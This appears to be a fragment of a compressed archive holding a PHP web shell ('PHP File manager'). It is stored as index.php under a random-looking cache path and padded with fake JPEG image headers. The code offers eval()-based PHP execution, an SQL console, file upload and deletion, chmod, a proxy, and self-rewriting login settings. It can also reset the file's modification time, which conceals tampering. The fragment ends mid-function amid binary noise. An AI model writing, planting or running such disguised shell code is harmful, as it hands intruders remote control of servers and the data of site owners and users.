2}&o 1L3\=K?gew=jgڔ3*Sc>g彍TknU)>g)WVh[LlCM쌮kM܇p1?1'7Pݷ~ic%O,)GJ)	ȳ ѽf+~l1F*=7fNNDqQZ^oLr-zG~KHpKȖr<].&d.0[ ZE,1ӝS˞(dt p#?2%cUc㎺(vGvfxd#k]rJ(̚*$KmÎe萰xn7$
x@w?96V
(aY2	m1̃#SEXWw*Rkl% ɂTWlxa','
u_qH b=W|$p}G/
O8kl]Shhwzp3"ursV@~'F8fP3	bvkrjGy#_:Dn%%aDMSѻ%&g/]wB}LI_i`]o8i3u9ݵv_=c8ƍ5l-boi2R׳,7-$Gc5[DW_9*즭&SWdrK8<zThO)<xs=M"=oƞaUy`[4PQ<rE"(7C 5!3tu -tvWz.REn!\AS%yY}R*_hmNc<LrscF	H+ؓ(?M~
)vY<;}d۾VhmM+"}wQ:A+*!ēp!d*q@RırF@C4%@[( 
htf_IcMsVg~KOm_%XNGBӝPiFADcWV!QjlKIx=۱	D]ђYѩW֑IEK[RlK$3jUMlߍ	rm	_m/]#>;!tc&)ctV1 V;RYދjy`ʄ1A],e?~⪑MC՝ :MFWŠCZJ+T2DE7&K|Ybԗ7{&ʳ]"_TVc>/;QzNg7o29e)ζ,ҿQ)xOGŴ^c3x_801T%t骛$g\T[xD4ݹb#ij6+ݩ9GCćǓZf,uRJ^dy	~|YQfh|ej
qrSO>ǊsK֟ 0LbL8w{wPO6kl飼KJ-ck?-[lʷ=b`|hZt̅qŐTm8UQHeX~I}FG*=D&-`ưJǟ$/#A,ЯLa삹,j"Y'Ϡ^P07^W]\\eKa2u\aƤ#+蕇*7CːN"j=*ltM:Y+ɋd! +HsxP!f?QV/ 
i'PĊPX6s0 ۥ_N=]Jr FOb}"Ɠ~A?mSf2,U=5:azj\׸:+[^aLt[̐s&K@&{p=@eaJƌ
J+ZO8T6o
u]_W'4FO{ q'RNH88? Undei	z05f6+Ft
9g9*RC[5e[iuž;?!&;~4Pxo6it'gY(̗ܡ1.lIfab~sd]QI,-񅅞Z\vs}SH#n{c-\[>QO5GB2ܷ39-)M) @E(.=b@վ:KI)`{;/CCx-H`kPW!W@ڱ	!8"w;q(1!	U)đC pi	x)C-b |N`Qv*-NΗEH-,5W&%tg6gAYmǴ-$HMFjѻK/<,$*;͘F=3v=UOhK㘛wiiUҴ9RbD"`ɠ=(X*Tx33Al1lp\}	oDm-M\ޙ}vn.f_{~lJcMoNoAZ'Hb]<NfF5 3b$eźL%P>!&	E}`O/Uv[N84QxZfσ y_pm 3w3Y+|tWZӔ+T{r$@+yo
J,̲`\%&C^C9So\FWKQwٮ7Fj}.z zy%'vȺ]yN+FSήB#FXB|Vz[fy7Iqaʫmz)0K%]
A=_]9T7I]-9yV .G0M[̆TG63Ğﳽ/ʯQM^Gߵ5Cg'ɠk6\*`<\3!uXWwoKQݶXin_0q{a'a{W ^1A-8 Rz&1P05@3IJ3cNZNqF&PJ_AUSGD	vn3YZ, s(r~5>=#&^p3ФK<"jk|E3/&K?*?/F3p4fM]RU2+?-&8B:RdP3=W!)KAF(k%i;>lϠz QgNADuV'we+褷g(J<mqq̶G8h+dj:$[-q+\vܕNJy ދPJX￁b=6'?221X(1)M?Y6%#+AKMl/ȼܹ-A#NFa[nmqݡlht6sTau͖88z>:;N֔j>R`Ϛ\HՀB"=3wL_Eٟg|p䀭<fv\7֯rn͇<>^;:IRY?WAM*:y_Cm i~tf"H80XK0NCEO2U'_q$hOdå*,<lO5_ͱriBeVF_zb5PW7<U.W[GJj>:t +(=?[$stѬطbg 3RvѳѲuX{Ӻ|'HBgF.?vbE'e%n~~4khtز,iraAI𛿰LzW[A}sUhEK6Ȅ<ĹV<JRޚhK5W1^OcX?V+["gkr66j~@rʀ6*!GvtElK̗M?P4\<PHq\tWY7,TcB&1m m6!4p밣^{}6C 'fb,HU3Ta'
CqR&ӆxemT%EQT.L
/rZ8Q]r9FM?<qU"[)15SvSD:v;NHc?A0#ٶK 9ᣇaM)EOg7 ܪŶcҀeayu֜59;ӭD<I-%-dt&_޼<{0TAeZ}pl?JCSQ@|jS$w,d,8i|Yv$]wLDy jK>Q$@-Q].F4f>MVϧW`,\]ox$7l9/{ށ(BaspnaOGߊwsl0hz%<6W=/35\DSjF[uT7k_lNT͂g E ;aCϨP`2s{d   GBMBPK     \D*: : C  archive/js/archive/includes/2023/tmp/cache/tmp/zqceu/vlya/index.phpnu 6$        ÿØÿà JFIF      ÿÛ „ 	 ( %!1!%)+//.383,7(-.+

                                                                                                   

-%%-////---/-.+/--+------/------/--0+--/-/-----.-----ÿÀ  ¥2" ÿÄ               ÿÄ J  	     ! 1AQ"aq2‘#BR‚¡ÁÑ3br’¢±Âð$CSƒ²á4c“%DsÓñÿÄ              ÿÄ *        !1AQa‘"2q3±ð#b¡ÿÚ   ? ¼QxJQaÍuò¸Zö Úü8,ÐÚú
"SSn<rçù–´âE—^ªBÖ9À\†¸ÔÁT­ÃÛ5
ëd´³Í#Ý;Þ38œî ¶H£M:wÎ3…³…âpÔF&‚FK¸9„â4àGEõªfÿ ‘ñ(ßw­pŽF|È¥ù®häðÍÑ¶¹‘[ÒinÙW¶ùñY˜Q{›K"išÒ[Ú8žë\F¹@-?v"ÔU”,ìöžkÿ {I‡£šÍ?e
ríV
?>
.........................................
.............................................................................                                                  
                                                                                                                                                                                     
ÿØÿà JFIF      ÿÛ „ 
	 (
 %!1!%)+//.383,7(-.+



-%%-////---/-.+/--+------/------/--0+--/-/-----.-----ÿÀ  ¥2" ÿÄ     
          ÿÄ J  	     ! 1AQ"aq2‘#BR‚¡ÁÑ3br’¢±Âð$CSƒ²á4c“%DsÓñÿÄ

              ÿÄ *        !1AQa‘"2q3±ð#b¡ÿÚ 
  ? ¼QxJQaÍuò¸Zö 

Úü8,ÐÚú

"SSn<rçù–´âE—^ªBÖ9À\†¸ÔÁT­ÃÛ5
ëd´³Í#Ý;Þ38œî ¶H£M:wÎ3…³…âpÔF&‚FK¸9„â4àGEõªfÿ ‘ñ(ßw­pŽF|È¥ù®häðÍÑ¶¹‘[ÒinÙW¶ùñY˜Q{›K"išÒ[Ú8žë\F¹@-?v"ÔU”,ìöžkÿ {I‡£šÍ?e
ríV
?>
.........................................
.............................................................................    


????????????????????????????????????
????????????????????????????????????



                                              
                                                                                                                                                                                     
ÿØÿà JFIF      ÿÛ „ 	 ( %!1!%)+//.383,7(-.+

                                                                                                   

-%%-////---/-.+/--+------/------/--0+--/-/-----.-----ÿÀ  ¥2" ÿÄ               ÿÄ J  	     ! 1AQ"aq2‘#BR‚¡ÁÑ3br’¢±Âð$CSƒ²á4c“%DsÓñÿÄ              ÿÄ *        !1AQa‘"2q3±ð#b¡ÿÚ   ? ¼QxJQaÍuò¸Zö Úü8,ÐÚú
"SSn<rçù–´âE—^ªBÖ9À\†¸ÔÁT­ÃÛ5
ëd´³Í#Ý;Þ38œî ¶H£M:wÎ3…³…âpÔF&‚FK¸9„â4àGEõªfÿ ‘ñ(ßw­pŽF|È¥ù®häðÍÑ¶¹‘[ÒinÙW¶ùñY˜Q{›K"išÒ[Ú8žë\F¹@-?v"ÔU”,ìöžkÿ {I‡£šÍ?e
ríV
?>
.........................................
.............................................................................                                                  
                                                                                                                                                                                     
ÿØÿà JFIF      ÿÛ „ 
	 (
 %!1!%)+//.383,7(-.+



-%%-////---/-.+/--+------/------/--0+--/-/-----.-----ÿÀ  ¥2" ÿÄ     
          ÿÄ J  	     ! 1AQ"aq2‘#BR‚¡ÁÑ3br’¢±Âð$CSƒ²á4c“%DsÓñÿÄ

              ÿÄ *        !1AQa‘"2q3±ð#b¡ÿÚ 
  ? ¼QxJQaÍuò¸Zö 

Úü8,ÐÚú

"SSn<rçù–´âE—^ªBÖ9À\†¸ÔÁT­ÃÛ5
ëd´³Í#Ý;Þ38œî ¶H£M:wÎ3…³…âpÔF&‚FK¸9„â4àGEõªfÿ ‘ñ(ßw­pŽF|È¥ù®häðÍÑ¶¹‘[ÒinÙW¶ùñY˜Q{›K"išÒ[Ú8žë\F¹@-?v"ÔU”,ìöžkÿ {I‡£šÍ?e
ríV
?>
.........................................
.............................................................................    


????????????????????????????????????
????????????????????????????????????



                                              
                                                                                                                                                                                     
<?php




/* PHP File manager ver 1.5 */

// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');
$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg_ntimes = ''; // service string
$default_language = 'de';
$detect_lang = true;
$fm_version = 1.6;



// Little default config
$fm_default_config = array (
	'make_directory' => true, 
	'new_file' => true, 
	'upload_file' => true, 
	'show_dir_size' => false, //if true, show directory size → maybe slow 
	'show_img' => true, 
	'show_php_ver' => true, 
	'show_php_ini' => false, // show path to current php.ini
	'show_gt' => true, // show generation time
	'enable_php_console' => true,
	'enable_sql_console' => true,
	'sql_server' => 'localhost',
	'sql_username' => 'root',
	'sql_password' => '',
	'sql_db' => 'test_base',
	'enable_proxy' => true,
	'show_phpinfo' => true,
	'show_xls' => true,
	'fm_settings' => true,
	'restore_time' => true,
	'fm_restore_time' => false,
);

if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE['fm_config']);

// Change language
if (isset($_POST['fm_lang'])) { 
	setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
	$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;

// Detect browser language
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
	$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
	if (!empty($lang_priority)){
		foreach ($lang_priority as $lang_arr){
			$lng = explode(';', $lang_arr);
			$lng = $lng[0];
			if(in_array($lng,$langs)){
				$language = $lng;
				break;
			}
		}
	}
} 

// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];


//translation
function __($text){
	global $lang;
	if (isset($lang[$text])) return $lang[$text];
	else return $text;
};

//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
	if($recursive && @is_dir($file)) {
		$els = fm_scan_dir($file, '', '', true);
		foreach ($els as $el) {
			if($el != '.' && $el != '..'){
				fm_del_files($file . '/' . $el, true);
			}
		}
	}
	if(@is_dir($file)) {
		return rmdir($file);
	} else {
		return @unlink($file);
	}
}

//file perms
function fm_rights_string($file, $if = false){
	$perms = fileperms($file);
	$info = '';
	if(!$if){
		if (($perms & 0xC000) == 0xC000) {
			//Socket
			$info = 's';
		} elseif (($perms & 0xA000) == 0xA000) {
			//Symbolic Link
			$info = 'l';
		} elseif (($perms & 0x8000) == 0x8000) {
			//Regular
			$info = '-';
		} elseif (($perms & 0x6000) == 0x6000) {
			//Block special
			$info = 'b';
		} elseif (($perms & 0x4000) == 0x4000) {
			//Directory
			$info = 'd';
		} elseif (($perms & 0x2000) == 0x2000) {
			//Character special
			$info = 'c';
		} elseif (($perms & 0x1000) == 0x1000) {
			//FIFO pipe
			$info = 'p';
		} else {
			//Unknown
			$info = 'u';
		}
	}
  
	//Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
 
	//Group
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
 
	//World
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));

	return $info;
}

function fm_convert_rights($mode) {
	$mode = str_pad($mode,9,'-');
	$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
	$mode = strtr($mode,$trans);
	$newmode = '0';
	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
	$newmode .= $owner . $group . $world;
	return intval($newmode, 8);
}

function fm_chmod($file, $val, $rec = false) {
	$res = @chmod(realpath($file), $val);
	if(@is_dir($file) && $rec){
		$els = fm_scan_dir($file);
		foreach ($els as $el) {
			$res = $res && fm_chmod($file . '/' . $el, $val, true);
		}
	}
	return $res;
}

//load files
function fm_download($file_name) {
    if (!empty($file_name)) {
		if (file_exists($file_name)) {
			header("Content-Disposition: attachment; filename=" . basename($file_name));   
			header("Content-Type: application/xml");
			$fp = fopen($file_name, "r");
			while (!feof($fp)) {
				echo fread($fp, 65536);
				flush(); // this is essential for large downloads
			} 
			fclose($fp);
			die();
		} else {
			header('HTTP/1.0 404 Not Found', true, 404);
			header('Status: 404 Not Found'); 
			die();
        }
    } 
}

//show folder size
function fm_dir_size($f,$format=true) {
	if($format)  {
		$size=fm_dir_size($f,false);
		if($size<=1024) return $size.' bytes';
		elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';
		elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';
		elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';
		elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))
		else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)
	} else {
		if(is_file($f)) return filesize($f);
		$size=0;
		$dh=opendir($f);
		while(($file=readdir($dh))!==false) {
			if($file=='.' || $file=='..') continue;
			if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file);
			else $size+=fm_dir_size($f.'/'.$file,false);
		}
		closedir($dh);
		return $size+filesize($f); 
	}
}

//scan directory
function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
	$dir = $ndir = array();
	if(!empty($exp)){
		$exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	}
	if(!empty($type) && $type !== 'all'){
		$func = 'is_' . $type;
	}
	if(@is_dir($directory)){
		$fh = opendir($directory);
		while (false !== ($filename = readdir($fh))) {
			if(substr($filename, 0, 1) != '.' || $do_not_filter) {
				if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){
					$dir[] = $filename;
				}
			}
		}
		closedir($fh);
		natsort($dir);
	}
	return $dir;
}

function fm_link($get,$link,$name,$title='') {
	if (empty($title)) $title=$name.' '.basename($link);
	return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}

function fm_arr_to_option($arr,$n,$sel=''){
	foreach($arr as $v){
		$b=$v[$n];
		$res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
	}
	return $res;
}

function fm_lang_form ($current='en'){
return '
<form name="change_lang" method="post" action="">
	<select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
		<option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
		<option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
		<option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>
		<option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>
		<option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
	</select>
</form>
';
}
	
function fm_root($dirname){
	return ($dirname=='.' OR $dirname=='..');
}

function fm_php($string){
	$display_errors=ini_get('display_errors');
	ini_set('display_errors', '1');
	ob_start();
	eval(trim($string));
	$text = ob_get_contents();
	ob_end_clean();
	ini_set('display_errors', $display_errors);
	return $text;
}

//SHOW DATABASES
function fm_sql_connect(){
	global $fm_config;
	return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}

function fm_sql($query){
	global $fm_config;
	$query=trim($query);
	ob_start();
	$connection = fm_sql_connect();
	if ($connection->connect_error) {
		ob_end_clean();	
		return $connection->connect_error;
	}
	$connection->set_charset('utf8');
    $queried = mysqli_query($connection,$query);
	if ($queried===false) {
		ob_end_clean();	
		return mysqli_error($connection);
    } else {
		if(!empty($queried)){
			while($row = mysqli_fetch_assoc($queried)) {
				$query_result[]=  $row;
			}
		}
		$vdump=empty($query_result)?'':var_export($query_result,true);	
		ob_end_clean();	
		$connection->close();
		return '<pre>'.stripslashes($vdump).'</pre>';
	}
}

function fm_backup_tables($tables = '*', $full_backup = true) {
	global $path;
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
	if($tables == '*')	{
		$tables = array();
		$result = $mysqldb->query('SHOW TABLES');
		while($row = mysqli_fetch_row($result))	{
			$tables[] = $row[0];
		}
	} else {
		$tables = is_array($tables) ? $tables : explode(',',$tables);
	}
    
	$return='';
	foreach($tables as $table)	{
		$result = $mysqldb->query('SELECT * FROM '.$table);
		$num_fields = mysqli_num_fields($result);
		$return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;
		$row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));
		$return.=$row2[1].$delimiter;
        if ($full_backup) {
		for ($i = 0; $i < $num_fields; $i++)  {
			while($row = mysqli_fetch_row($result)) {
				$return.= 'INSERT INTO `'.$table.'` VALUES(';
				for($j=0; $j<$num_fields; $j++)	{
					$row[$j] = addslashes($row[$j]);
					$row[$j] = str_replace("\n","\\n",$row[$j]);
					if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
					if ($j<($num_fields-1)) { $return.= ','; }
				}
				$return.= ')'.$delimiter;
			}
		  }
		} else { 
		$return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);
		}
		$return.="\n\n\n";
	}

	//save file
    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';
	$handle = fopen($file,'w+');
	fwrite($handle,$return);
	fclose($handle);
	$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';
    return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}

function fm_restore_tables($sqlFileToExecute) {
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
    // Load and explode the sql file
    $f = fopen($sqlFileToExecute,"r+");
    $sqlFile = fread($f,filesize($sqlFileToExecute));
    $sqlArray = explode($delimiter,$sqlFile);
	
    //Process the sql file by statements
    foreach ($sqlArray as $stmt) {
        if (strlen($stmt)>3){
			$result = $mysqldb->query($stmt);
				if (!$result){
					$sqlErrorCode = mysqli_errno($mysqldb->connection);
					$sqlErrorText = mysqli_error($mysqldb->connection);
					$sqlStmt      = $stmt;
					break;
           	     }
           	  }
           }
if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;
}

function fm_img_link($filename){
	return './'.basename(__FILE__).'?img='.base64_encode($filename);
}

function fm_home_style(){
	return '
input, input.fm_input {
	text-indent: 2px;
}

input, textarea, select, input.fm_input {
	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	border-color: black;
	background-color: #FCFCFC none !important;
	border-radius: 0;
	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}

.home {
	background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg==");
	background-repeat: no-repeat;
}';
}

function fm_config_checkbox_row($name,$value) {
	global $fm_config;
	return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';
}

function fm_protocol() {
	if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
	if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
	if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	return 'http://';
}

function fm_site_url() {
	return fm_protocol().$_SERVER['HTTP_HOST'];
}

function fm_url($full=false) {
	$host=$full?fm_site_url():'.';
	return $host.'/'.basename(__FILE__);
}

function fm_home($full=false){
	return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
}

function fm_run_input($lng) {
	global $fm_config;
	$return = !empty($fm_config['enable_'.$lng.'_console']) ? 
	'
				<form  method="post" action="'.fm_url().'" style="display:inline">
				<input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
				</form>
' : '';
	return $return;
}

function fm_url_proxy($matches) {
	$link = str_replace('&amp;','&',$matches[2]);
	$url = isset($_GET['url'])?$_GET['url']:'';
	$parse_url = parse_url($url);
	$host = $parse_url['scheme'].'://'.$parse_url['host'].'/';
	if (substr($link,0,2)=='//') {
		$link = substr_replace($link,fm_protocol(),0,2);
	} elseif (substr($link,0,1)=='/') {
		$link = substr_replace($link,$host,0,1);	
	} elseif (substr($link,0,2)=='./') {
		$link = substr_replace($link,$host,0,2);	
	} elseif (substr($link,0,4)=='http') {
		//alles machen wunderschon
	} else {
		$link = $host.$link;
	} 
	if ($matches[1]=='href' && !strripos($link, 'css')) {
		$base = fm_site_url().'/'.basename(__FILE__);
		$baseq = $base.'?proxy=true&url=';
		$link = $baseq.urlencode($link);
	} elseif (strripos($link, 'css')){
		//как-то тоже подменять надо
	}
	return $matches[1].'="'.$link.'"';
}
 
function fm_tpl_form($lng_tpl) {
	global ${$lng_tpl.'_templates'};
	$tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
	$str = '';
	foreach ($tpl_arr as $ktpl=>$vtpl) {
		$str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
	}
return '
<table>
<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'.$str.'
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>
</form>
</table>
';
}

function find_text_in_files($dir, $mask, $text) {
    $results = array();
    if ($handle = opendir($dir)) {
        while (false !== ($entry = readdir($handle))) {
            if ($entry != "." && $entry != "..") {
                $path = $dir . "/" . $entry;
                if (is_dir($path)) {
                    $results = array_merge($results, find_text_in_files($path, $mask, $text));
                } else {
                    if (fnmatch($mask, $entry)) {
                        $contents = file_get_contents($path);
                        if (strpos($contents, $text) !== false) {
                            $results[] = str_replace('//', '/', $path);
                        }
                    }
                }
            }
        }
        closedir($handle);
    }
    return $results;
}


/* End Functions */

// authorization
if ($auth['authorize']) {
	if (isset($_POST['login']) && isset($_POST['password'])){
		if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) {
			setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization']));
			$_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
		}
	}
	if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) {
		echo '
';  
die();
	}
	if (isset($_POST['quit'])) {
		unset($_COOKIE[$auth['cookie_name']]);
		setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
	}
}

// Change config
if (isset($_GET['fm_settings'])) {
	if (isset($_GET['fm_config_delete'])) { 
		unset($_COOKIE['fm_config']);
		setcookie('fm_config', '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_url().'?fm_settings=true');
		exit(0);
	}	elseif (isset($_POST['fm_config'])) { 
		$fm_config = $_POST['fm_config'];
		setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization']));
		$_COOKIE['fm_config'] = serialize($fm_config);
		$msg_ntimes = __('Settings').' '.__('done');
	}	elseif (isset($_POST['fm_login'])) { 
		if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
		$fm_login = json_encode($_POST['fm_login']);
		$fgc = file_get_contents(__FILE__);
		$search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg_ntimes .= __('File updated');
				if ($_POST['fm_login']['login'] != $auth['login']) $msg_ntimes .= ' '.__('Login').': '.$_POST['fm_login']['login'];
				if ($_POST['fm_login']['password'] != $auth['password']) $msg_ntimes .= ' '.__('Password').': '.$_POST['fm_login']['password'];
				$auth = $_POST['fm_login'];
			}
			else $msg_ntimes .= __('Error occurred');
			if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
		}
	} elseif (isset($_POST['tpl_edited'])) { 
		$lng_tpl = $_POST['tpl_edited'];
		if (!empty($_POST[$lng_tpl.'_name'])) {
			$fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
		} elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
			$fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);
		}
		if (!empty($fm_php)) {
			$fgc = file_get_contents(__FILE__);
			$search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
